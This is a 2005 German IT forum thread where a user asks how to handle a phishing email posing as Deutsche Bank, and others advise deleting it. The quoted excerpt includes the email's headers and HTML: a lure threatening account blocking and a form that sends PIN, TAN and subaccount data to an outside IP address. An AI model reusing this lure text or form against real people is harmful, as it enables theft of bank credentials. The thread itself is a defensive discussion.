rutrox 10 Geschrieben 3. Mai 2005 Melden Teilen Geschrieben 3. Mai 2005 Hallo an die MCSEboard-Gemeinde, hoffentlich bin ich jetzt im richtigen Forum. :rolleyes: Andernfalls meine Bitte an einen Admin/Moderator: Beitrag verschieben. Heute habe ich meine erste Phishing-Mail erhalten... Keine Sorge, es ist nix passiert. :D Dass es sich um Phishing :suspect: handelt, ist mir auch gleich aufgefallen, weil die Mail angeblich von einer Bank stammt, mit der ich noch nie in irgendeiner Form was zu tun hatte - von der Deutschen Bank. Außerdem mache ich kein Home-Banking. Die Mail selbst habe ich nicht geöffnet - Eudora sei Dank - sondern nur die Incoming-Datei, die im ASCII-Format vorliegt. ;) Meine Frage: Wie sollte ich jetzt am besten weiter vorgehen? Die Phishing-Mail gleich löschen oder kann/sollte man die Polizei (?) darüber infomieren? Für Eure Antworten bereits im Voraus schon mal besten Dank! Nachfolgend ein Auszug der Mail. Im Ganzen zeige ich sie nicht, da ich nicht weiß, wer sich sonst noch hier auf diese Seite verirrt. Sollte das gegen die Boardregeln verstoßen dann bitte ich hier einen Admin/Moderator den Auszug dieser Mail zu löschen! Meine darin enthaltene E-Mail-Adresse und die meines Providers habe ich selbstverständlich geändert. From ???@??? Tue May 03 20:01:39 2005 Received: from [82.249.16.185] (helo=lns-p19-8-idf-82-249-16-185.adsl.proxad.net) by mx28.gmx.net with esmtp (gmx.net 4.105 #282) id 1DSdiE-0005gC-00 for geheime.adresse@gmx.net; Mon, 02 May 2005 18:24:03 +0200 From: Support Deutsche Bank! <Stelmaszek@support.DeutscheBank.Online.de> To: geheime.adresse <geheime.adresse@gmx.net> Subject: geheime.adresse, Geehrte Kunden und Kundinnenu Deutsche Bank! Date: Mon, 02 May 2005 17:44:54 -0700 Message-ID: <001101c54f79$9d5212cd$ca815542@support.DeutscheBank.Online.de> MIME-Version: 1.0 Content-Type: text/html X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2605 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Virus-Scanned: by amavisd-milter at lns-p19-8-idf-82-249-16-185.adsl.proxad.net Sender: Stelmaszek@support.DeutscheBank.Online.de <x-html> <html> <head> <title></title> </head> <body> <form action="http://219.163.9.224/manual/login_trigger.php"> <td bgcolor="#FFFFFF"> <font size="5" face="Arial"> </font><font size="5" color="#0D0D86" face="Arial">Herzlich willkommen!</font><p><font face="Arial" size="2">Geehrte Kunden und Kundinnenu Deutsche Bank!</font></p> <p><font face="Arial" size="2">Lesen sie bitte aufmerksam diese Meldung ueber die Datensicherung. Wir arbeiten, um unsere Anwender gegen den Betrug zu verteidigen. </font></p> <p><font face="Arial" size="2">Ihr Konto wurde zur Kontrolle gewaehlt, wir brauchen das, um zu bestaetigen, dass Sie ein echter Besitzer dieses Kontos sind. Doch Sie sollen alle folgenden Punkte beachten. Fuellen Sie bitte die ganzen Felder, die weiter gehen, aus und druecken Sie Login. <br> <br> Merken Sie sich, wenn Sie die Information waehrend 24 Stunden nicht bestaetigen, sollen wir unbedingt Ihr Konto fuer seine Verteidigung blockieren. <br> </font></p> <b><font size="2" face="Arial">Unterkonto <br> (2-stellig)</font></b><p> <input type="text" maxLength="2" size="2" value="00" name="SubAccount"> <p> <td valign="top"> <b><font size="2" face="Arial">PIN<br> (5-stellig)</font></b><p> <input type="password" maxLength="5" size="6" value name="PIN"><p> </td> <td valign="top"><b><font size="2" face="Arial">TAN<br> (6-stelling)</font></b><p> <input type="password" maxLength="7" size="6" value name="TAN"></td> Zitieren Link zu diesem Kommentar
checkms 10 Geschrieben 3. Mai 2005 Melden Teilen Geschrieben 3. Mai 2005 Ignorieren und löschen! Thema ist bekannt -> http://www.heise.de/security/news/meldung/59240 Zitieren Link zu diesem Kommentar
PAT 10 Geschrieben 3. Mai 2005 Melden Teilen Geschrieben 3. Mai 2005 Jup, kann mich checkms nur anschließen. Ist ne bekannte Masche, genau die gleiche Mail kam diese Tage sogar im Fernsehen bei irgendsoner Sendung. Am besten löschen und ignorieren. Rechtliche Handhabe hast Du eh keine, sogar kaum, wenn Du drauf reinfallen solltest. Zitieren Link zu diesem Kommentar
BlackShadow 12 Geschrieben 4. Mai 2005 Melden Teilen Geschrieben 4. Mai 2005 mich würde interessieren wo <form action="http://219.163.9.224/manual/login_trigger.php> das landet :) in einer mysql db? löschen und gut ... schließe mich allen anderen an gruß frank Zitieren Link zu diesem Kommentar
saracs 10 Geschrieben 4. Mai 2005 Melden Teilen Geschrieben 4. Mai 2005 mich würde interessieren wo<form action="http://219.163.9.224/manual/login_trigger.php> das landet :) in einer mysql db? löschen und gut ... schließe mich allen anderen an gruß frank das landet in japan! www.watt.co.jp Zitieren Link zu diesem Kommentar
BlackShadow 12 Geschrieben 4. Mai 2005 Melden Teilen Geschrieben 4. Mai 2005 @saracs schon wenn das die ip ist :) nur dieses formular is irgend wie komisch. es werden die variablen "pin" und "tan" übergeben. u.a. auch SubAccount was aber eine max. Länge von 2 hat würds ja logisch finden wenn man da die ganze KTO Nr eintragen würde. na das Formale ist ned seine stärke: ><font face="Arial" size="2">Geehrte Kunden und Kundinnenu Deutsche Bank!</font> Frauen zu erst :p ich arbeite auch mit php und Formular eingaben damit kann man viele viele sachen machen gruß Frank Zitieren Link zu diesem Kommentar
rutrox 10 Geschrieben 4. Mai 2005 Autor Melden Teilen Geschrieben 4. Mai 2005 Hallo Leutz, vielen Dank für Eure Antworten und Infos! :) Schade, dass es gegen solche Mails bzw. gegen den/die Absender keine rechtliche Handhabe gibt. Na, dann bleibt mir leider wohl nix anderes übrig, als dieses "Ungeheuer" zu löschen :( und die Hoffnung, dass wir alle hier in Zukunft von solchen Betrügereien verschont bleiben. :shock: Gruß rutrox Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.